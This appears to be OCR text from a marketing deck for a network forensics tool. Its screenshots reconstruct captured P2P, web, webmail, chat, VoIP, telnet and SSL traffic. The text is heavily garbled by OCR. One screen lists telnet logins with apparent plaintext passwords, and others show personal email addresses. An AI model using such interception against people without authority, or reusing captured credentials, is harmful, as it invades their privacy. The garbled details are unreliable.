Cisco lcons 1.ppt 


DWA-642 ds. pdf 


DSN-3200-10 ds.pdf 


2. 10:351 


2008-01 


1. 10:35: 


(Е https//192.168.1.12/general/common/download php?display name-DWA-642 ds.pdf&file-/datas/EDE 1/ - Windows Internet Explorer е 


Go- Е А [> crawler Search 


P ~| 


Не Edit GoTo Favorites Help 
йг Favorites | @ https//192168.112/general/common/download... 


№ > + СЛ № У Раде“ Safeyv Toolsy Qv ” 


мч 123 м 


(20a: ФФ Slt /; еее Ы dg 


Wirelessly connect to the 
Internet for work or play 


Greater wireless reception around 
your home or office 


Backward compatible 
with 802.11g networks 


—— —À 


EXCEPTIONAL PERFORMANCE 
The D-Link? RangeBooster N® Notebook CardBus Adapter (DWA-642) is a draft 802.11n compliant wireless client for your notebook PC that delivers up to 12x 
faster speeds! and 4x farther range' than an 802.119 network while staying backward compatible with 802.119 networks. Once connected, you can share a 
high-speed Internet connection, photos, files, music, printers, and more. 


GET CONNECTED, STAY CONNECTED 

The RangeBooster М Notebook CardBus Adapter is powered by RangeBooster N technology to provide superb wireless performance in your home or office. 
Connect to a RangeBooster N Router (DIR-625) and experience smooth Internet phone calls (VoIP), responsive network gaming, secure Web surfing, faster file 
transfers, enhanced audio streaming, and greater wireless coverage in larger homes and offices'. The DWA-642 supports WPA™ and WPA2™ encryption that 
allow you to connect securely to а wireless network. 


EASY TO SETUP, EASY TO USE 
D-Link’s Quick Adapter Setup Wizard guides you step-by-step through the installation process. Configure this notebook adapter without having to call a 
networking expert to help you. The D-Link Wireless Manager is also included with this product to keep track of your most frequently accessed networks so that 
you can join them quickly and easily. 

With unmatched wireless performance, reception, and security protection, the D-Link RangeBooster № Notebook CardBus Adapter (ОМА-642) is a great choice 
for easily adding or upgrading wireless connectivity to your notebook PC. 


Ае 


@ Unknown Zone | Protected Mode: Off aay 


64.7.2 


64.7.2)0 164 
ы File Download 


Do you want to open or save this file? 


а 


n 


Name: DWA-642 ds.pdf 
Type: Adobe PDF Reader, 594KB 
From: 192.168.1.12 


While files from the Intemet can be useful, some files can potentially 
ham your computer. If you do not trust the source, do not open or 
save this Не. What's the risk? 


3 Current Page 3 


Sample : File Transfer (P2P File 


Sharinc 


Case Management | Import Analysis | Auto Import Analysis | User Management | System Setup | Download or Burn ISO Logout | 
Case Маше: default ~ Raw Data Import Filter: М/А | Y Import Record | Build Backup ISO | 


e 
REPORT E-MAIL CHAT АЦЕ TRANSFER] GAME HTTP TELNET VOIP SSL FUNCTION аж 
P2] Every Раде :[ 10 
No Date-Time Account Tool File Name Last Activated Send Receive Detail 
Throughput Throughput 
2009-06-18 В 2009-06-18 у 
12. 12-10-56 192.168.1.142 Foxy 1.9.8.0 04.Hero - Mariah Carey.mp3... 12-10:56 0B 1.90K Detail 
2008-09-22 Les = А 2008-09-22 А 
11. 09-56-50 192.168.1.142 Foxy 1.9.8.0 KE AREER -Него(5 Come B... 09:58:42 0B 5.26M Detail 
2008-09-22 — ++ : 2008-09-22 | 
3 3 ЖЕ 
10. 09-56-24 192.168.1.142 Foxy 1.9.8.0 = Rear al ]-Него-Мапаћ Carey.mp3 сы 0B 858М Detail 
2008-09-22 "m 2008-09-22 р 
У I-HER... 
9 09-56-05 192.168.1.142 Foxy 1.9.8.0 = Җ-Сап You Keep A Зесге(Н Él-HER pipi 0B 6 42M Detail 
в. 2008-0922 192168110 Foxy 1980 ЖЫ дй 328200702. —— 4.63M 0B Detail 
7 2008-09-22 192 1681142 BitTorrent е hetps//192.168.1 12/genera/common/show_ meg рр? PROG PAP PAP meg PAPE JDK- ID&T. SQLI -Selectiz0 - Windows Intemet Explore МЕ m Detail 
09:39:31 
2008-09-22 3 — - | 
S- өзке Не BitTorrent | 1 жылына riore Mariah Carev поз — я j| Рей | Nox m АЗК Detail 
па. в ' à — е = | Every Page: 
5 5. 192 1681110 Foxy 1.9.8 25 Date-Time: 2008-09-22 09:56:24 | IP: 192.168.1.142 | File Name: ij-Hero-Mariah Carey.mp3 21M Detail 
No Date-Time Action P-IP Port P-Port =: 
4. 2008-09-22 192.168.1.10 Foxy 1.9 81 2008-09-22 09:56:24 Download 122.124.6.143 51573 6407 4918 ||11M Detail 
09:55:01 2. 2008-09-22 09:56:24 Download 122.124 6.143 51576 6407 492B 
3. 2008-09-22 192 168133 Foxy 1.9.8| 3. 2008-09-22 09:56:24 Download 118.161.244.30 51579 11243 545B| || 31K Detail 
09:54:13 4. 2008-09-22 09:56:24 Download 59.125.156.64 51578 6019 3.29K _ 
«« 12 мм | 5 2008-09-22 09:56:46 Download 61.59.238.168 51615 6503 атәв | тепе Page 1 
| 6 2008-09-22 09:56:50 Download 118.161.209.155 51612 4901 523 23K 
T 2008-09-22 09:57:04 Download 60.250.100.76 51635 9446 515.31K 
8. 2008-09-22 09:57-04 Download 203.222 42.58 51680 5081 512.50К | 
9. 2008-09-22 09:57-08 Download 61.229.222.3 51685 5751 9508 _ 
M4123 »» ЗЕЕ HERES БЕ Total 24 Total Page 3 Current Page 1 
Done @ Internet | Protected Mode: Off а 7 Q10% + 


Sample : HTTP (Web Reconstruct) 


Case Results Case Management | Import Analysis | Auto Import Analysis | User Management | System Setup | Download or Burn ISO | Logout | 
Case Маше: default ~ Raw Data Import Filter: N/A т Import Record | Build Backup ISO | 


REPORT E-MAIL CHAT FILE TRANSFER GAME TELNET МОР SSL FUNCTION | | ASK 
No. Date-Time Account Content 
549. 2009-06-18 12:22:36 192.168.1.11 [3 http-//www.dlink.com.sg/support/support detail. asp 
548. 2009-06-18 12:22:24 192.168.1.11 [3 http://www.dlink.com.sg/support 
547. 2009-06-18 12:21:24 192.168.1.11 7 http://sg.news.yahoo.com/ap/20090618/twl-brazil-plane-1beQ00c... 
546. 2009-06-18 12:12:11 192.168.1.11 [3 http-//ads.yimg.dom/hb/i/sg/adv/test/sg m ysm iframe 2008090... 
545. 2009-06-18 12:12:10 192.168.1.11 [3 http://sg-news-y@hoo.com/afp/20090617/tap-entertainment-sing... 
544. 2009-06-18 12:12:02 76 пераја 168.1 12/ general common show ma pop? РОО ТРИЗ mig pea ОХАЈА SOLI=Sel- Windows Internet Explore Е) 


543. 2009-06-18 12:11:45 547 _http://sg.news.yahoo.com/ap/20090618/twi-brazil-plane-1be00ca_html | iframe aiiis 
542. 2009-06-18 12:11:43 “YAHOO! News — | 
SINGAPORE 
541. 2009-06-18 12:11:42 Sin nh Use? Sign Up 090506.h.. 
Help 
540. 2009-06-18 12:11:42 : 
мч 123456789 им Total 549 Total Page 55 Current Page 1 


Autopsies suggest Air France jet broke up in sky 4" 
MOST POPULAR – WORLD 
Viewed 


АР - Thursday, June 18By STAN LEHMAN and EMMA МАМООВЕ Associated Press Writers 
SAO PAULO - Autopsies have revealed fractures in the legs, hips and arms of Air France 
disaster victims, injuries that _ coupled with the large pieces of wreckage pulled from the 

› Мета ‘stiff upper lip’ may Atlantic _ strongly suggest the plane broke ир in the air, experts said Wednesday. 
explain cancer death rate ADVERTISEMENT 

» Climate change is 
happening ‘here, now: US 
report 

» Airbus a big winner at 
Paris Air Show 

> Obama signs note for gil 
who played hooky to see 
him 

» Court orders Exxon to pay Learn more and give | 


$507.5 min for 1989 spill Search Monkey atry 
' View Complete List » CS RA = 


тета | Protected Mode: Off. fà - 910% ~ 


Sample : HTTP (Download/Upload) 


Case Management | Import Analysis | Auto Import Analysis | User Management | System Setup | Download or Burn ISO | Logout | 
Case Name: default ~ Raw Data Import Filter: N/A > Import Record | Build Backup ISO | 


ө 
REPORT E-MAIL CHAT FILE TRANSFER GAME[HTTP|TELNET VOIP SSL FUNCTION | GU 
No.  Date-Time Account Action File Name сема URL E = 
Мате Size 
2008-09-22 Е ae . . 
224. 09-19-06 192.168.1.9 Download [7 flower zip zip http-//c icq.com/xtraz2/img/flower/flower zip 4.04К 
223. раен 192.168.1.9 Download E] avatar.zip zip http://c.icq.com/xtraz2/img/avatar/avatar.zip 450K 
222 or 192.168.1.9 Download [+] backgammon.zip zip http://c icq.com/xtraz2/img/backgammon/backgammon.zip 5.57K 
2008-09-22 т : http-//webmail.seed.net tw/UploadAttachment.do? 
221 09-18-39 192.168.1.10 Upload Г] 60%160_01_PP jpg jpg webmailkey=20. 414.53K 
2008-09-22 М у http://webmail.seed_net.tw/UploadAttachment.do? 
220. 09-18-39 192.168.1.10 Upload 60X160 01 PP.jpg Јр9 webmailkey=20. 0B 
-| - D i ? 
219. eei 192168110 Upload d 60Х160 6 httr webmail. seed.net.tw/UploadAttachment.do* 53B 
218 2008-09-22 вы — (3 60x160 0 aet tw/UploadAttachment.do? 0B 
09:18:39 Do you want to open or save this file? = 
2008-09-22 es Ее 2 Pt tw/UploadAttachment.do? 
217 09:18:39 и: Type: JPEG Image, 414KB “ 60Х160 0 0B 


мч 910 11 12 13 14 Е Total 320 Total Page 40 Current Page 13 


(ока )[ Sw J[ сә ) 


| ж. While files from the Intemet can be useful, some files can potentially 
д harm your computer. Ё you do not trust the source, до not open or 
save this file. What's the risk? 


Sample: HTTP (FLV Video 


Case Маше: default ~ Raw Data Import Filter: N/A 


352. 


351. 


350 


мч 12345 м 


Date-Time 


2009-06-18 
12:10:56 
2008-09-22 
10:06:07 
2008-09-22 
10:06:07 
2008-09-22 
09:48:54 
2008-09-22 
09:48:54 
2008-09-22 
09:46:53 
2008-09-22 
09:46:53 
2008-09-22 
09:46:15 


Account 


192.168.10.10 


192.168.1.33 


192.168.1.33 


192.168.1.33 


192.168.1.33 


192.168.1.33 


192.168.1.33 


192.168.1.33 


ш 
Streaminc 
Case Management Import Analysis Auto Import Analysis || User Management System Setup Download or Burn ISO Logout 


ы Import Record Build Backup ISO 


e 
[НТТР TELNET VOIP SSL FUNCTION | | OK 
[ 8 

HOST File Name URL € 

ize 

1 0, os 0, 
аас 1HTTPVIDEO Ir2IpB fiv beni IN.mccont.com/ItemFiles/9655BFrom9620www.metacafe.com^6 589.30K 
203.66.48.101 УНТТРМОЕО  kjeXsc.flv http://203.66.48.101/youtube/4/Go2Fg4xSE2c?7ivit-9196&origina... 1.00М 
youtube.com +Gnomish engineer underwater ro... http://tw.youtube.com/watch?v-Go2F g4xSE2c&feature-related 1.00M 
203.66.48.36 +HTTPVIDEO_QgNOZE Яу http://203.66.48.36/youtube/1/X3 VPQhlyno?ivit-8149&original. 2.60M 
youtube.com PERSE A It ah A, http://tw.youtube.com/watch?v=X3_VPQhlyno&NR=1 2.60M 
203.66.48.36 AHTTPVIDO. 0TQQVT.flv http://203.66.48.36/youtube/1/4e 7N5Ppkr7g?ivit28033&original... 2.41M 
Г ff E = sf. | со 
youl Ё hitps://192.168.10.60/nttp/piffer.swi?file=/datas/20... ЕНИН youtube.com/watch?v-4e7N5Ppkr7g&NR-1 241M 
(е паре 9216810600030 Meyers ied. 13 Certificate Error | |. 

203.6 mm mmm 1103.66.48. 100/youtube/4/w3i8c VwNMKkE ?ivit-8005&origina... 984.61K 


Q Internet | Protected Mode: Off 


fav 
a 


Total 37 Total Page 5 Current Page 1 


v 


Sample: Telnet (with play back) 


Case Results Case Management | Import Analysis | Auto Import Analysis | User Management | System Setup | Download or Вит ISO Logout 


Case Name: default ~ Raw Data Import Filter: М/А 


REPORT E-MAIL CHAT FILE TRANSFER GAME HTTP 


Ватт] 

No. Date-Time 

13. 2008-09-22 09:43:33 
12. 2008-09-22 10:01:32 
11. 2008-09-22 10:09:02 
10. 2008-09-22 10:09:30 
9. 2008-09-22 09:51:26 
8. 2008-09-22 10:01:49 
7. 2008-09-22 10:23:20 
6. 2008-09-22 09:44:43 
мч 12 м 


Account 
192.168.1.142 
192 168.1.10 
192.168.1.9 
192.168.1.9 
192.168.1.142 
192.168.1.10 
192.168.1.142 
192.168.1.142 


X Import Record Build Backup ISO 


Server 
140.112.172.11 
140.113.17.154 
140.112.172.11 


GAME HTTP VOIP SSL FUNCTION 
User Password 
guest 
guest 
ІБІВІБІВІВІВІВІВІВІВІВІВІВІВІВ y 
[Cdoiecisionboss jmyohxbc 


OBOBOBOBOBOBOBOBOBOBOBOB 
guest 
lafa188 


new 


lafa1965 


yes 


140.112.172.11 
140.112.172.11 

140.113.30.91 
140.112.172.11 
140.112.172.11 


О. — пица T, 
@ https//192.168.1.12/general/common/show msg php? PROG-telneUtelnet- msg. php& IDX-7&T. SQLI.- Sele - Windows Internet Explorer 


@ Internet | Protected Mode: Off 


| OK 
Every Раде: Сон | 
Record File Size 
TELNET_86faf7340e41c708.dat 4.62К 
TELNET b8f/788b20e41c736.dat 22.68К 
TELNET d7160cffüe41c790.dat 38.62К 
TELNET 1605f5270e41c81f dat 95.75К 
TELNET 630779d90e41c837.dat 4.89К 
TELNET f29e118d0e41c858.dat 32.31K 
TEUJIET  85621bcb0e41c8c9.dat 121.37K 
(МЕТ e0611e8e0e41c97c.dat 189.66K 
otal 13 Total Page 2 Current Page 1 


Sample: VoIP SIP/H.323 RTP Voice 


Calls 


Case Management| Import Analysis | Auto Import Analysis | User Management | System Setup | Download or Burn ISO | Logout | 


Case Name : default + Raw Data Import Filter: N/A X Import Record | Build Backup ISO | 


REPORT E-MAIL CHAT FILE TRANSFER GAME HTTP TELNET SSL FUNCTION | AS 
[s vore] Upload | _ Every Раде: 4) Confirm | 
NO. Date-Time Account Caller Callee Mode Type Codec File Name Time 
12 20080671 19216868 886100444070 88610000104 peer to peer SIP 6723 + МОЈР hyFW9c.wav 8 Sec 
11. 20980871 60.250.163.131 8610044407 18610000104 peer to peer SIP 6723 4 VOIP_bvidJi.wav 8 Sec 
(0. 20050811 19216868 8861004440 818610000104 peer to peer SIP 6723 + VOIP_ItPNjo.wav 8 Sec 
ә 290906711 60250163131 88610044407 8610000104 peer to peer SIP 6723 + VOIP_x00mWt.wav 9 Бес 
в 29090811 19216868 88610044407 88610000104 peer to peer SIP G723 4 VOIP_M5JSAz.wav 10 Sec 
т. 20090611 60.250.163.131 8610044407 8610000104 peer to peer SIP 6723 + VOIP 01%Ғ wav 11 Sec 
e. 20090611 19216868 18610044407 88610000104 peer to peer SIP 6723 +ҮЙР ембі6Кмау 8 Sec 


с £722 
File Download — 


XSQ.wav 8 Sec 


Page 2 Current Page 1 
Do you want to open or save this file? 


Name: 8610044407 8610000104.wav 
Type: Wave Sound, 556 bytes 
From: 192.168.1.12 


[ оғ || з= |( Сака ) 


У 
2, 


Г ^» While files from the Intemet can be useful, some files can potentially 
Y harm your computer. If you do not trust the source, do not open or 
save this file. V/hat's the risk? 


Sample: HTTPS/SSL Traffic 


Case Management | Import Analysis | Auto Import Analysis | User Management | System Setup | Download or Burn ISO | Logout | 
Case Name: default ~ Raw Data Import Filter: N/A ы Import Record | Build Backup ISO | 


REPORT E-MAIL CHAT FILE TRANSFER GAME HTTP TELNET vOIP/SSL FUNCTION | OK 
В 2 | — -— = Every Page:| 8] Сопіт | 

Мо Date-Time Account Client-IP Server-IP == File Мате Bytes 
Mi E 192.168.1.11 192168111 1921681200 443 Ф551 ЕМС 3232235787 43203 1245299812 1245301317 2.75K 
mS 192 168.111 192 168111 1921681200 443 @551 ЕМС 3232235787 43189 1245299802 1245301317 2.75K 
üd "о 192.168 1.11 192168111 — 1921681200 443 #55! ЕМС 3232235787 43187 1245299792 1245301317 2.75K 
11182 ptm 192. 168.111 192168111 1921681200 443 #55! ЕМС 3232235787_43184 1245299782 1245301317 2 75К 
п 7722 192 1681.11 192 168111 1921681200 443 Ф551 ЕМС 3232235787 43179 1245299772 1245301317 2.75K 
Wi T 192 168.1.11 192168111 — 1921681200 443 Ф551 ЕМС 323 5787 43177 1245299762 1245301317 2.75K 
im E. 192.168.1.11 192168111 1921681200 443 @SSL_ENC 232235787 43175 1245299752 1245301317 2.75K 
њу 192.168.1.11 192168111 1921681200 443 Ф551 ЕС 3232235787 43173 1245299742 1245301317 2.75K 
мч 123456789 мм Total 11,185 Total Page 1,399 Current Page 1 

X 
>P Upload Key File 
Certificate File : 


Upload | 


SSL Private Key is required to decrypt the SSL encrypted content. 


User Management Features 


Case Results | Case Management | Import Analysis | Auto Import Analysis | User Management System Setup | Download or Вит ISO | Logout | 

Group User Authority сеа Function 

N/A admin Admin 2009-03-20 11:40:56 Modify Password odify Authority | Modify Priority Case Visibility 

N/A decision1 Analyst 2009-06-19 15:46:49 Delete | Modify Password dify Authority | Modify Priority Case Visibility 

N/A decision2 Analyst 2009-06-19 15:50:15 Delete | Modify Password ; Authority | Modify Priority Case Visibility 
default default Group Admin 2009-03-20 11:40:56 elete | Modify Password j Modify Priority Cz 
default decision user1 User 2009-06-19 15:50:40 Delete | Modify Password | Modify Authority | Modify Priority | Case Visibility | 

decision_group1 decision_group1 Group Admin 2009-06-19 15:51:41 Delete | Modify Password | Modify Authority | Modify Priority Case Visibility 
Visible Сафе List 
Case Name Read Write Modify 


Create New User 


* Authority : N/A М 
ше 
‘Pasw | 
* Confirm Password HN 


* Priority : normal v 


Submit 


note : * is the required field 


Case Management Features 


Case Results |[Сазе һ Import Analysis | Auto Import Analysis | User Management | System Setup | Download or Burn ISO | Logout | 


Creation Case 
Date-Time Name 


2009-03-20 default default admin © ООО 


Creator Path Function 


Modify Priority | Imported Record Query Result 


Delete 


11:40:56 
2009-06-19 a : = z ===> 

16-11-13 decision_group1 Case1 admin Ә [/datas/rawdata import/cases/di Delete Clear | Modify | Modify Priority | Imported Record | Query Result 
C decision group1 Case2 admin Ә [/datas/rawdata import/cases/di Delete Clear | Modify | Modify Priority | Imported Record | Query Result 


Create New Case 


16:11:27 


Raw Data Imported History Raw Data Imported List 
ID = карш User Case Name TagName File Delete | File Date-Time File Source Import File 
te-Time 
X 


Create Case Name 


‘CaseName:[ | 


'CasePathName:[ — 00 ] 


* Group : ” 


* Priority : normal ~ 


Submit 


Note : * is the required field 


Importing PCAP for Analysis & 


Reconstruction 


Case Results | Case Management | Import Analysis Auto Import Analysis | User Management | System Setup | Download or Burn ISO | Logout | 


File Source : Group default +” Case default ~ Рат: /datas/rawdata_import/cases/default/default/ 
[Г] File Мате File Date-Time File Size Function 
[Е] НТТР VIDEO METACAFE. pcap 2009-06-16 09:55:55 2.0MB odify File 
[Е] HTTP VIDEO ҮООТУВЕ.рсар 2009-06-16 09:53:02 8.4MB Delete Modify File Name 
[Г] SAMPLE.pcap 2008-07-02 10:47:25 TTMB 
[Г] raw 1 2008-10-13 09:45:26 12MB 
ГІ гам 10 2008-10-13 09:47:44 2.9MB 
[Е] raw 11 2008-10-13 09:48:04 1.4МВ 
[ГЇ raw 12 2008-10-13 09:48:16 14MB 
[Г] raw 13 2008-10-13 09:48:26 1.2MB 
ГІ гам 14 2008-10-13 09:48:32 2.2MB 
[Г] raw 15 2008-10-13 09:48:36 284KB 
[Г] raw 16 2008-10-13 09:48:40 1.4MB e Name 
[Г] raw 17 2008-10-13 09:48:46 4.3MB 
ГІ гам 18 2008-10-13 09:48:50 8.1MB 
[Е] raw 19 2008-10-13 09:48:56 7.0MB 
Е raw 2 2008-10-13 09:45:44 5.7МВ 
[Г] raw 20 2008-10-13 09:49:04 87MB e Name 
[Е] raw 21 2008-10-13 09:49:12 76KB Delete e Name 
[а raw 22 2008-10-13 09:49:16 476КВ Delete |1 e Name | 


Tag Name : 2009-06-19 16:17:17 File-Time : From № oy: ” To [. È ЕН HE = a Analyze Log] 


Reconstructed Data Export/Backup 


Case Results 


Case Management | Import Analysis | Auto Import Analysis | User Management | System Setup | Download or Burn ISO | Logout | 
Case Name - default ~ Raw Data Import Filter: N/A Import Record | [ Build Backup 150 | | Build Backup ISO | Backup ISO 


CATEGORY 

ALL № $ РОРЗ М Ф 5МТР М) Фа imap 

= Webmail(Read) [V| (2 Webmail (Sent) М № MSN М ЕЙ со 

У) YAHOO м 8 оо в UT UT Chatroom В ** SKYPE 

‘S GOOGLETALK В | 2 IRC Chatroom М @ rrP М Æ рор 

Ф Online Game М) © НТТР Link (Vj @ HTTP Content [7] ӘЙ HTTP Upload/Download 
4/ НТТР Reconstruct [7] У video Stream М] GS Telnet М Ә уор 

8 551 


Case Results | Case Management Import Analysis Auto Import Analysis | User Management | 


System Setup 


Download or Burn ISO Logout | 


Network Setup/ System Backup/ Port Setting/ Update System Time/ System Reboot/PowerOff/ Upgrade/ Registration 


Screen will refresh 14 s 


Job ID Date/Time Prority Subject Owner " Function 
23 2009-06-19 16:37:17 222 Export in Case : default admin Stop | 
и«1»м х Tota Page a Page T Current Page 1 
Job Subject : Export in Case : default 
Job Status : 


030 2009-06-19 16:38:05 INFO DECODING 

едйс mkexport : Backup starting - 18 $ 
030 2009-06-19 16:38:05 INFO DECODING 

едас mkexport : Backup starting - 18 + 
030 2009-06-19 16:38:06 INFO DECODING 

eddc mkexport : Backup starting - 18 % 
030 2009-06-19 16:38:06 INFO DECODING 

eddc mkexport : Backup starting - 18 + 
030 2009-06-19 16:38:06 INFO DECODING 

eddc mkexport : Backup starting - 18 % 
030 2009-06-19 16:38:06 INFO DECODING 

eddc mkexport : Backup starting - 18 $% 
030 2009-06-19 16:38:06 INFO DECODING 

eddc mkexport : Backup starting - 18 % 
030 2009-06-19 16:38:06 INFO DECODING 

епіс mkexport : Backup starting - 18 + 
|030 2009-06-19 16:38:06 INFO DECODING 

eddc mkexport : Backup starting - 18 $ t 


Offline Packet 
Reconstruction Series 
Fore ды Py P .. Шай 


X 


p „АШ " 


Introduction to Forensics 


Investigation Toolkit (FIT 


Offline Raw Data Files (PCAP) Decoding 
Т кк» апа Reconstruction Tool 

= | à Version 
Solution for: 


| also 
% 


Available 
ж Internet & Network Traffic Content Analysis (Network 


Administrator) 


Auditing of Internet & Network Traffics (Network 
Administrator) 


Ken week BYR er AAA КА dilvedtightWindows based 
роса ћепом V ge suitable for all group of users to 
analyze and forensically investigate on the content of 
Internet/network raw data files captured. 

ompatible а 


Academic 


“ЖЕ 


Ф 
«Xx 


—— 


Internet 
Content 
' _ Analysis and 
TAN Reconstruction 


Compatible with 
O 


Ж 


Му 


Window? 


Forensics Investigation Toolkit 


Application 


LAN - ex: eth0..123..pcap 


бе» | eth0..456..pcap 


Internet Raw Data 


PCAP format (LAN Administrator 


Officers 


Forensics Investigation Toolkit (FIT) 


Sample: Email (POP3, SMTP and 


У Network Forensics Analysis Toolkit 
: File Edit View Case Management Tool Window Help 


: = =: Р E 
Object sh Сх "ы ^ pops @ SMTP -x 
= ЈАН SEE air 
= E-Mail ж еу Datetime v | Source ІР Source MAC Destination IP Sender Receiver СС sub body si^ 
РОРЗ [33] Г] 11/5/2009 5:34:54 PM 192.168.1.10 |00:0е:а6:55:ес:с9 139.175.252.15 | 121 тэ... |vic(deci... | | Bandwidth Monito... | 
е C] 11/5/2009 5:34:54 PM |192.188.110 |00:0е:а6:55:ес:с8 138.175.25215 decision. vic@deci... Fwd: а — test 34 
А :34: s l. Ше:ар ог: ec; c А 5 : ,üecISIOn... мс ЕСІ... үү : gl 
Ей ы С 11/5/2009 5:34:54 РМ |192 1681.10 00:0е:а8:55:ес:с9 139.175.252.15 — decisi ic&deci.. | Fwd: NN 34 
WebMail(Send) [47] Г] |11/5/2008 5:34:54 РМ |182.168.1.10 00:0е:а6:55:ес:с9 |138.175.252.15 — rickwang... vic@deci... [Bug 2297]=?UTF... 
=. CHAT О 19/10/2009 11:11:56 AM 192.168.1.190 |00:0a:e4:0d:cD:d8 |220.130.118.240 decision ... decision1... Hi, This is a test ... 1,82 
MSN [3] С (9/10/2009 11:11:56 AM |192.168.1.190 00:0а:е4:09:с0:08 220.130.119.240 decision ... decisiont...| Hi, This is a test ... 48 
ICQ [1] Г] 9/10/2009 11:11:56 AM | 192.168.1.180 00:0а:е4:00:с0:08 |220.130.119.240 decision ... decision1... Hi, This is a test ... 5 
2. [3] ГІ 8/10/2008 11:11:56 АМ | 192.168.1.190 |00:0а:е4:04:с0:48 |220.130.119.240 decision .. decision!.. | Hi Thisis atest.. | 57 
5. [n Г] (9/10/2009 11:11:56 AM |192.168.1.190 |00:0а:е4:09:с0:98 | 220.130.119.240 decision .... decision! ... i, This is a test ... 
UT Chatroom [1] O 19/10/2009 11:11:56 AM | 192.168.1.180 00:0а:е4:00:с0:08 | 220.130.119.240 |decision ... decisio" T EE 
GoogleTalk [2] 3 Г] |annmonna 11:11:56 АМ |199 1R8 1 1an (NN Nad Ades (220 130 119 24D. | derision derisin| 
|< › 


Receiver: 


decision 1239 


рещ 


address: 220.130.119.240 


Mail Server's ТР 


Detail 
Hi, This is a test mail 38! 


Whois Source Code 


Detail Content 


Whois 


Return-Path: «decision test(àyam.com» 
X-Original-To: decisian123@pchame.com.tw 
Delivered-To: decision123@pchome.com tw 
Received: from mx16.pchome.com.tw (mx16.pchome.com tw [220.130.118.228]) 
by msB4.pchome.com.tw (Postfix) with ESMTP id 582C0DC56802A 
for <decision123@pchome.com.tw=>; Wed, 9 Sep 2009 17:13:55 +0800 (CST) 


Received: from localhost (localhost [127 .0.0.1]) 
hye УЛ Ro nohnama eam ha ПОН saith ЕСМТР id ЭПЕЕЕБРВЕГАЕГ 9 


decision_test@yam.com 
2009/09/10 (Thursday) 
decision] 23@pchome.com.tw 


Content 


Sample: Webmail - Yahoo Mail, Gmail, 


Hotmail etc... 


У Network Forensics Analysis Toolkit 


: File Edit View Case Management Tool Window Help 


: = ЈЕ Pp е byGoogle 
CGT | о Webmail Received -x 
Б ЕЛ: ЗЕ ^ 
= E-Mail а Datetime Source IP Source MAC Destination IP Sender Receiver ce sub 
POP3 [33] Г] 11/2/2009 10:03:29 АМ 192.168.1.202 00:0А:Е4:0:С0:08 |72.14.203.18 decisioner.. decisione... 8908250... 333333333333... 
IMAF [8] С 11/2/2009 10:03:29 AM | 192.168.1.202 00:0А:Е4:00:С0:08 72.14.203.18 — emailconfir.. decisione... u8906250... Please confir... 
ve m | Ш 11/2/2009 10:03:29 АМ 192.168.1.202 00:0А:Е4:00:С0:08 72.14.203.18 |welcome... |decisione... и8908250... "Welcome to Li... 
WebMail(Send) [47] O 11/2/2009 10:03:28 AM | 182.168.1.202 00:0А:Е4:00:С0:08 | 72.14.203.18 |decisionQ3... decisione... u8806250... |Fwd:Fwd:Fw: ... 
= CHAT Г] |11/2/2008 10:03:28 AM |192.168.1.202 00:0А:Е4:00:С0:08 | 72.14.203.18 decision)... decisione... u8906250... n&mjseednet... | 
MSN [3] Г] 11/2/2008 10:03:29 AM |192.188.1.202 00:0A:E4:0D:CO:D8 |72.14.203.18 — decision12.. decisione. decision12.. FW: pchomel... | 
ICQ [1] Г] 11/2/2009 10:03:30 AM | 192.168.1.202 00:0А:Е4:00:С0:08 |72.14.203.18 | 121@msea.... decisione... decision12... |жж 
ТАНОО [3] O 11/2/2009 10:03:30 ТЕ. 721420348  121@msa.... decisione... decision12... | 
id 7 С 11/2/009 ТОПИК 721420318 _ 1219msa... decisi [decisi 
UT Chatroom [1] О 11/2/2009 10:03:30 AM 192.168.1202 '00:0АЕ4:00:С0:08 721420318  |vic@decisi... | de 
GoogleTalk [2] 2 E 11/2/2009 10:03:30 AM 192.168.1.202 |00:0АЕ4:00:С0:08 |72.14.203.18 — |тапмебфа.. де 
‹ › Г] (11/2/2009 10:03:30 AM | 182.168.1.202 |00:0А:Е4:00:С0:08 | 72.14.203.18 


Po—— зря 


Detail C contend Хоит Cod Detailed == 


name.com + Google 


Every domain name now comes 
with select Google Apps FREE! 


Detail Whois X Source Code 


Welcome to LinkedIn! 
МИНИ ke о nte nt 
Send Date: 2009/11/02 (Monday) 10:03 


Receiver decisioner@gmail.com 


Detail Content Whois 


href=". /image/gmail css1.css"»«link rel="stylesheet" type="text/css" href=". /image/gmail css2.css"» «/head» «body bgcolor=# 
ellpadding=0 cellspacing=0 border=0 align=center class=h><tr><td><h2><font size= 1»«b» Welcome to LinkedIn! «/b» «/font» <, 
| Jellpadding=1 cellspacing=0 border-0 босоіог=#сссссс align=center><tr><td><a name="?"></a><table width= 100 


href="mailto:;welcome@linkedin.com"><font color="#00681C"><b>LinkedIn</b></fant></a>&nbsp; </h3>&lt welcame@linkedin.q 


<tr><td colspan=2=>To: decision er &ltdecisioner@gmail.com&gt; gcolor=#ffffff=<td colspan=2><div cla 


ample: ІМ -Yahoo, MSN, ICQ, IRC,- 


Es Network Forensics Analysis Toolkit 


File Edit View Case Management Tool Window Help 


= CHAT 


ICQ [1] 

YAHOO [3] 

ОО [3] 

SKYPE [1] 

UT Chatroom [1] 

GoogleTalk [2] 

IRC Chatroom [1] 
= File Transfer 


MSN ях 


Chat Session 


8 Captured Time Participator 


Source MAC Destination IP 


T \ 
| | | | | 
_ 11/5/2009 5:34:09 PM 192.188.1.10 !00:0е:аб:55:ес:с9 0.0.0.0 diesiscàmsB2.hinet.net [ugly 168@hotmail.com 10 
10/30/2008 11:12:28 АМ |192.168.1.203 | 00:0е:аб:55:ес:с9 00.0.0 decision test(&hotmail.com | shmily.d0613@msa.hinet.net 0 


Source IP Chat Session Owner 


6/15/2008 2:04:53 PM 


decision_test@hotmail.com 


6/15/2009 2:05:42 PM 


decision_test@hotmail.com 


6/15/2009 2:05:57 PM 


decision_test@hotmail.com file transfer 


6/15/2009 2:06:00 PM 


decision_test@hotmail.com video 


6/15/2009 2:06:07 PM 


and voice call 


Acie mame? hinet nel 


decision_test@hotmail.com 
Tm ; 2009/06/15 4:0 


Captured Time: у 


Source MAC: 00:0а:е4:00:с0:08 


Source IP: 192.168.1.190 
Destination IP: 0.0.0.0 


Chat Session Owner: 


decision_test@hotmail.com 


Chat Session 


diesis@ms62.hinet.net 


TN Sample: File Transfer - FTP 
ШІ 


Upload/Download 


£$ Network Forensics Analysis Toolkit ЕЗ 

File Edit View Case Management Tool Window Help 

№ _ РЕ 
IRC Chatroom [1] ^ 

= Sa) ЗЕ Captured Time Source MAC Source IP Destination IP ШЫ Transfered File Maps 
